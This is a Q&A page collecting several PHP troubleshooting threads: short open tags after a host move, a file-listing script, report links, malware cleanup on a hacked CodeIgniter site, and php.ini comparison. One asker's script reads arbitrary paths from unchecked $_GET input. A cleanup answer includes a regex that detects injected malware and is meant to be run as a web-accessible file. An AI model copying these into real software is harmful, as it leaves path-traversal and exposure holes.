PHP errors when changing hosts - php

I've recently inherited a website written in PHP and given the responsibility to move it from the current host to our own internal web servers.
I successfully copied the files and I can browse the site on our web server (IIS7); however, some, but not all, of the PHP scripts do not appear to execute properly.
For example, the following code loads some text content from a database and displays fine on the existing server,
<?php
$sql = "select * from tblsubpages where PageID = 1 " ;
$page_Result=mysql_query($sql);
while ( $page_Row = mysql_fetch_array ( $page_Result))
{
?>
<?=str_replace('<blockquote>','',$page_Row['Details']); ?>
However, on the new server all I get is the following output in the place where the text content should be:
','',$page_Row['Details']); ?>
The files are identical on both sites and I've verified they can both successfully connect to the MySQL server.
Question - Any ideas where I can begin troubleshooting or what can be the cause?

It might be a problem with php.ini's short_open_tag directive on your new host. Check if it is off and if so, try switching it on.

In the php.ini file set :
short_open_tag = On
or change
<?=
to
<?php

First things first.
Make sure you are using the same PHP versions.
Copy over your php.ini file.
It looks like your ini file has short tags disabled. Change <?= to <?php echo

If you don't want to turn on short_tags you could try to convert them:
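// DIRECTORY must be defined as the root directory of the scripts to convert.
foreach (new RecursiveIteratorIterator(new RecursiveDirectoryIterator(DIRECTORY)) as $file) {
    if (!$file->isFile()) continue;
    $original = file_get_contents($file);
    $tokens = token_get_all($original);
    $source = '';
    foreach ($tokens as $token) {
        // single-character tokens are returned as plain strings
        if (is_string($token)) {
            $source .= $token;
            continue;
        }
        // replace the short echo tag with the long form
        if ($token[0] == T_OPEN_TAG_WITH_ECHO) {
            $token[1] = '<?php echo ';
        }
        $source .= $token[1];
    }
    // write back only the files that actually changed
    if ($source !== $original) {
        file_put_contents($file, $source);
    }
}
This iterates over the tokens of the source and replaces T_OPEN_TAG_WITH_ECHO by <?php echo.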

Related

Perform Delete, Edit and search operation on a file using php

I have a task in which I have to list the directories with their files, which I did, but I don't understand how to delete a file or edit a specific file in the directories. Any help will be appreciated. Thanks.
<?php
error_reporting(0);
if(isset($_GET['dir']))
{
// /$path = 'E:\xampp\\'.$_GET['dir'];
$path = $_GET['dir'];
}
else
{
$path = 'E:\xampp\\';
}
if(is_dir($path))
{
$arrDir = scandir($path);
echo "<ul>";
foreach ($arrDir as $key => $value)
{
echo "<a href='http://localhost/vishrut/FileUpload/filelist.php?dir=".$path.'/'.$value."'>".$value.'</a><br>';
}
echo "</ul>";
}
else
{
echo "<textarea>";
echo file_get_contents($path);
echo "</textarea>"."<br>";
}
?>
PHP has lots of functions to handle files: https://www.php.net/manual/en/ref.filesystem.php
For your needs see these:
file_get_contents to read the entire file contents
file_put_contents to write the content in a file
unlink to delete a file
So, the steps to modify a file may be:
get the complete contents with file_get_contents:
$contents = file_get_contents($filePath);
apply your edits to the $contents content:
$newContents = ...
overwrite the file content:
file_put_contents($filePath, $newContents);
To delete a file is simple:
unlink($filePath);
It's important to note that your code is subject to injection because you don't check the user data passed with $_GET.
If your script will be used only by you, it's OK; otherwise you must check all user input: the first rule of web programming is NEVER TRUST YOUR USERS! Also, trusted users may write wrong characters in the URL, and that may have unexpected results (e.g. deleting the wrong file!)
Read https://www.php.net/manual/en/mongodb.security.script_injection.php
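The answer's warning about unchecked $_GET input applies to every filesystem call in filelist.php: scandir and file_get_contents now, file_put_contents and unlink once editing and deleting are added. As an added example that is not part of the original post, one way to confine the dir parameter to a base directory; resolve_inside() and the temporary directory tree are constructed for illustration:

```php
<?php
// Added example (not from the original post). resolve_inside() and the
// temporary directory layout below are constructed for illustration.

/**
 * Map a request-supplied relative path onto $baseDir.
 * Returns the canonical absolute path, or null if the target does not
 * exist or resolves (via "..", absolute paths or symlinks) outside $baseDir.
 */
function resolve_inside(string $baseDir, string $userPath): ?string
{
    $base = realpath($baseDir);
    if ($base === false || strpos($userPath, "\0") !== false) {
        return null;
    }
    // Always interpret the input relative to the base, never on its own.
    $target = realpath($base . DIRECTORY_SEPARATOR . $userPath);
    if ($target === false) {
        return null;
    }
    // Compare with a trailing separator so ".../files-old" does not
    // pass as being inside ".../files".
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    if ($target !== $base && strncmp($target, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $target;
}

// --- Constructed sample tree: one allowed base, one sibling outside it ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'demo_' . bin2hex(random_bytes(4));
mkdir("$root/files/sub", 0700, true);
mkdir("$root/files-old", 0700, true);
file_put_contents("$root/files/sub/notes.txt", "hello <b>world</b>");
file_put_contents("$root/files-old/secret.txt", "outside the base");
$base = "$root/files";

// Inputs as they would arrive in $_GET['dir'] (constructed values).
$inputs = ['', 'sub', 'sub/notes.txt', '../files-old/secret.txt',
           'sub/../../files-old', "$root/files-old/secret.txt", 'missing.txt'];

foreach ($inputs as $in) {
    $path = resolve_inside($base, $in);
    if ($path === null) {
        echo "REJECT  " . var_export($in, true) . "\n";
    } elseif (is_dir($path)) {
        $entries = array_values(array_diff(scandir($path), ['.', '..']));
        echo "LIST    " . var_export($in, true) . " -> " . implode(', ', $entries) . "\n";
    } else {
        // Escape file contents before placing them inside HTML.
        echo "READ    " . var_export($in, true) . " -> "
            . htmlspecialchars(file_get_contents($path), ENT_QUOTES, 'UTF-8') . "\n";
    }
}

// Deleting goes through the same check: only a regular file inside the base qualifies.
$toDelete = resolve_inside($base, 'sub/notes.txt');
if ($toDelete !== null && is_file($toDelete)) {
    unlink($toDelete);
}

// Remove the constructed tree again.
unlink("$root/files-old/secret.txt");
rmdir("$root/files/sub");
rmdir("$root/files");
rmdir("$root/files-old");
rmdir($root);
```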

open file on client stored on server

I want to open a server stored html report file on a client machine.
I want to bring back a list of all the saved reports in that folder (scandir).
This way the user can click on any of the created reports to open them.
So if you click on a report to open it, you will need the location where the report can be opened from.
This is my dilemma. I'm not sure how to get a decent IP, port and folder location that the client can understand.
Below is what I've been experimenting with.
Using this won't work, obviously:
$path = $_SERVER['DOCUMENT_ROOT']."/reports/saved_reports/";
So I thought I might try this instead.
$host= gethostname();
$ip = gethostbyname($host);
$ip = $ip.':'.$_SERVER['SERVER_PORT'];
$path = $ip."/reports/saved_reports/";
$files = scandir($path);
After the above code I loop through each file and generate an array with the name, date created and path. This is sent back to generate a list of reports in a table that the user can interact with (open, delete, edit).
But this fails as well.
So I'm officially clueless on how to approach this.
PS. I'm adding react.js as a tag, because that is my front-end and might be useful to know.
Your question may be partially answered here: https://stackoverflow.com/a/11970479/2781096
Get the file names from the specified path and hit curl or get_text() function again to save the files.
function get_text($filename) {
    // start with an empty string so that .= never appends to an undefined variable
    $content = '';
    $fp_load = fopen($filename, "rb");
    if ( $fp_load ) {
        while ( !feof($fp_load) ) {
            $content .= fgets($fp_load, 8192);
        }
        fclose($fp_load);
    }
    return $content;
}
$matches = array();
// This will give you names of all the files available on the specified path.
preg_match_all("/(a href\=\")([^\?\"]*)(\")/i", get_text($ip."/reports/saved_reports/"), $matches);
foreach($matches[2] as $match) {
echo $match . '<br>';
// Again hit a cURL to download each of the reports.
}
Get list of reports:
<?php
$path = $_SERVER['DOCUMENT_ROOT']."/reports/saved_reports/";
$files = scandir($path);
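foreach($files as $file){
    if($file !== '.' && $file != '..'){
        // encode the name for the URL and escape it for the HTML output
        echo "<a href='show-report.php?name=".rawurlencode($file)."'>".htmlspecialchars($file, ENT_QUOTES)."</a><br/>";
    }
}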
?>
Then write a second PHP file for showing HTML reports, which receives the file name as a GET param and echoes the content of the given HTML report.
show-report.php
<?php
$path = $_SERVER['DOCUMENT_ROOT']."/reports/saved_reports/";
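if(isset($_GET['name']) && is_string($_GET['name'])){
    // basename() drops any directory part, so the request cannot leave saved_reports/
    $name = basename($_GET['name']);
    if(is_file($path.$name)){
        echo file_get_contents($path.$name);
    }
}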

My website seems to be hacked? Obscure code on the first line of every PHP file?

I have the following in the first line of every PHP file in my server:
I hope this didn't delete any of my code because I never backed my website up (it's hosted on a webhoster Arixe)
I've looked this up on Google, and it seems like WordPress had a similar problem. Problem is, this problem is only on my website, which isn't a WordPress site. The website is built on CodeIgniter.
I just checked my other codeigniter built websites and it seems as though this code got in all of them!
If you haven't a backup of your website you are screwed.
You should change your password and update your platform at any level (linux, php, framework and your website)
My problem was solved by changing all passwords (FTP, host, DB, WordPress) on the same host.
After that follow this:
1. Create a file called removemalware.php in your base CodeIgniter folder, alongside index.php.
2. Put this content in it.
<?php
// Walk every file below the site root (adjust the path to your installation).
$directory_iterator = new RecursiveIteratorIterator(new RecursiveDirectoryIterator('c:/wamp/www/yoursitehere', RecursiveDirectoryIterator::SKIP_DOTS));
foreach($directory_iterator as $filename => $file)
{
    if ($file->getExtension() !== "php") {
        continue;
    }
    $content = file_get_contents($filename);
    // Matches the injected block, from its opening isset($GLOBALS[...]) test up to the closing tag after "-1;".
    $reg = '/<\?\s*php\s*if\(!isset\(\$GLOBALS\[\"\\\\x61(.*?)-1;\s*\?>/s';
    $count = 0;
    $newContent = preg_replace ($reg, '', $content, -1, $count);
    // Rewrite only files in which exactly one injected block was found.
    if($count === 1) {
        echo $filename." with malware...<br>";
        file_put_contents ($filename, $newContent);
        echo $filename." rewrite without malware.<br>";
    }
}
3. Edit your .htaccess to allow removemalware.php to be accessed.
(example: RewriteCond $1 !^(index\.php|assets|public|thumbs|sitemap\.xml|robots\.txt|removemalware\.php))
4. Access the file, be happy.

FileDrop.js & PHP resulting in empty $_FILES

JSFIDDLE
I'm using filedrop.js to create a file repository structure within my app. The above noted JSFIDDLE has all of the Javascript / jQuery / HTML and CSS code for this small module. While everything on the client end seems to be functioning properly (files can be DnD'd, progress bar acts correctly, console shows proper event triggers), the result on the server-side is always an empty $_FILES variable. My PHP (ajax.receiveFile.php) is as follows:
var_dump($_FILES);
ob_start();
$callback = &$_REQUEST['fd-callback'];
$job_id = &$_REQUEST['job_id'];
$subdir = &$_REQUEST['subdir'];
$j = loadJob($job_id);
$save_path = "D:\\JobFiles\\" . $j->gOrderNumber() . "\\" . $subdir . "\\";
if ( ($_FILES['fd-file']['size'] > 0) && is_uploaded_file($_FILES['fd-file']['tmp_name']) ) {
$name = $_FILES['fd-file']['name'];
if (move_uploaded_file($_FILES['fd-file']['tmp_name'], $save_path.$name)) {
$j->addAttachment($subdir,$name);
echo 'true';
} else {
echo 'false';
}
}
ob_end_flush();
FileDrop.js seems to be doing what it is supposed to do, as shown here:
I read here on SO that using the same element name over multiple input types of "file" can cause errors but I'm not sure that is the case here. I have double- and triple-checked the permissions on both the TEMP and TARGET upload folders, I have confirmed that all PHP variables are set as needed via visual inspection and PHPINFO(). The server config is PHP 5.4 on IIS7.
If anyone has any ideas on what else to look for, please contribute. Thanks!
This works for me:
file_put_contents('uploads/person/7.jpeg', fopen('php://input', 'r'));

comparing 2 phpinfo settings

I'd like to compare the settings I have on 2 different servers. Both are shared hosting so I don't think I have enough access to do it any other way but programmatically with phpinfo. So now that I have the 2 outputs, I'd like to compare them without examining them manually. Is there an automated way for this?
Also, as a side but related note, I think phpinfo is the output of php.ini. Is this correct?
From the PHP Manual on phpinfo():
Outputs a large amount of information about the current state of PHP. This includes information about PHP compilation options and extensions, the PHP version, server information and environment (if compiled as a module), the PHP environment, OS version information, paths, master and local values of configuration options, HTTP headers, and the PHP License.
phpinfo() does more than just printing out php.ini settings.
If you want to process php.ini settings manually, you might want to check out ini_get_all() instead of phpinfo(). This returns an array of all configuration values.
You could transfer the output of ini_get_all() from server A to server B (for example by using var_export() to create PHP code to create the array, or serialize()), then use array_diff_assoc() to compare the settings.
export.php: (Server A)
<?php echo serialize(ini_get_all()); ?>
compare.php: (Server B)
<?php
function ini_flatten($config) {
$flat = array();
foreach ($config as $key => $info) {
$flat[$key] = $info['local_value'];
}
return $flat;
}
function ini_diff($config1, $config2) {
return array_diff_assoc(ini_flatten($config1), ini_flatten($config2));
}
$config1 = ini_get_all();
$export_script = 'http://server-a.example.com/export.php';
$config2 = unserialize(file_get_contents($export_script));
$diff = ini_diff($config1, $config2);
?>
<pre><?php print_r($diff) ?></pre>
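The answer above transports the settings with serialize()/unserialize(), which the PHP manual warns against for data from an untrusted source, and array_diff_assoc() reports only directives present in its first argument. The following added example, not the answerer's code, exchanges JSON instead and reports both sides; the function names and the sample values are constructed for illustration.

```php
<?php
// Added example, not the answerer's code. Function names and sample values
// are constructed for illustration.

/** Reduce ini_get_all() output to directive => local value. */
function ini_local_values(array $config): array
{
    $flat = [];
    foreach ($config as $name => $info) {
        $flat[$name] = is_array($info) ? $info['local_value'] : $info;
    }
    return $flat;
}

/**
 * Decode an export received from the other server. json_decode() yields only
 * arrays and scalars, so no objects are instantiated from the remote data.
 */
function ini_import(string $json): array
{
    $data = json_decode($json, true);
    if (!is_array($data)) {
        throw new InvalidArgumentException('export is not a JSON object');
    }
    $clean = [];
    foreach ($data as $name => $value) {
        if (is_scalar($value) || $value === null) {
            $clean[(string) $name] = $value;
        }
    }
    return $clean;
}

/** Report every directive that differs or exists on one side only. */
function ini_compare(array $local, array $remote): array
{
    $diff = [];
    foreach (array_keys($local + $remote) as $name) {
        $l = array_key_exists($name, $local) ? var_export($local[$name], true) : '(absent)';
        $r = array_key_exists($name, $remote) ? var_export($remote[$name], true) : '(absent)';
        if ($l !== $r) {
            $diff[$name] = ['local' => $l, 'remote' => $r];
        }
    }
    ksort($diff);
    return $diff;
}

// export.php on server A would emit:
//   echo json_encode(ini_local_values(ini_get_all()));
// Constructed sample of such an export, embedded so the example runs offline:
$remoteJson = '{"short_open_tag":"1","display_errors":"1","memory_limit":"128M","mysql.default_host":null}';

// Constructed stand-in for ini_local_values(ini_get_all()) on server B:
$local = ['short_open_tag' => '0', 'display_errors' => '1',
          'memory_limit' => '256M', 'opcache.enable' => '1'];

foreach (ini_compare($local, ini_import($remoteJson)) as $name => $pair) {
    printf("%-20s local=%-10s remote=%s\n", $name, $pair['local'], $pair['remote']);
}
```

An export script like this discloses the server's configuration to anyone who can request it, so remove it once the comparison is done.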
Comparing two php.ini files easily using a parse_ini_file function
Example code snippet
$firstIni = parse_ini_file('/etc/php5/apache2/php.ini');
$secondIni = parse_ini_file('/etc/php5/apache2/php.ini.save');
$firstIniDiff = array_diff($firstIni, $secondIni);
$secondIniDiff = array_diff($secondIni, $firstIni);
if (count($firstIniDiff) > 0) {
echo '<h1>php.ini changes</h1>';
echo '<ol>';
foreach ($firstIniDiff as $key => $val) {
echo '<li> php.ini'.$key.': '.$val.' ----> php.ini.save :'.(isset($secondIniDiff[$key]) ? $secondIniDiff[$key] : '').'</li> ';
}
echo '</ol>';
}
if (count($secondIniDiff) > 0) {
echo '<h1>php.ini.save changes</h1>';
echo '<ol>';
foreach ($secondIniDiff as $key => $val) {
echo '<li> php.ini'.$key.': '.$val.' ----> php.ini.save :'.(isset($firstIniDiff[$key]) ? $firstIniDiff[$key] : '').'</li> ';
}
echo '</ol>';
}
Found this question by searching and subsequently found a script which does exactly what I wanted (and I expect the OP wanted too).
https://github.com/brettalton/phpinfo-compare
Assuming you have a web server with curl, just put compare.php in a directory and change the values of $site1 and $site2 to URLs that fetch phpinfo, and you've got yourself an easy-to-read, pretty-printed diff. See the example on his blog - http://blog.brettalton.com/2012/08/09/phpinfo-compare/
If you just want to compare two php.ini files:
#!/usr/bin/php
<?php
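function load($export_script) {
    $config = array();
    foreach (file($export_script, FILE_IGNORE_NEW_LINES) as $line) {
        $line = trim($line);
        // skip blank lines, comments and section headers
        if ($line === '' || $line[0] == ';' || $line[0] == '[') continue;
        // split on the first '=' only, so values containing '=' stay intact
        $var = explode('=', $line, 2);
        if (count($var) < 2) continue;
        $config[trim($var[0])] = trim($var[1]);
    }
    return $config;
}
$export_script = 'php.ini';
$c1 = load($export_script);
$export_script = 'php52.ini';
$c2 = load($export_script);
foreach( $c1 as $key => $val ) {
    // a key missing from the second file counts as a difference
    $other = isset($c2[$key]) ? $c2[$key] : '(not set)';
    if( $val == $other ) continue;
    echo $key.': '.$val.' // '.$other."\n";
}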
?>
<?php var_dump(ini_get_all()); ?>
Then take the outputs and paste them into https://www.diffnow.com or your favorite diff-er.
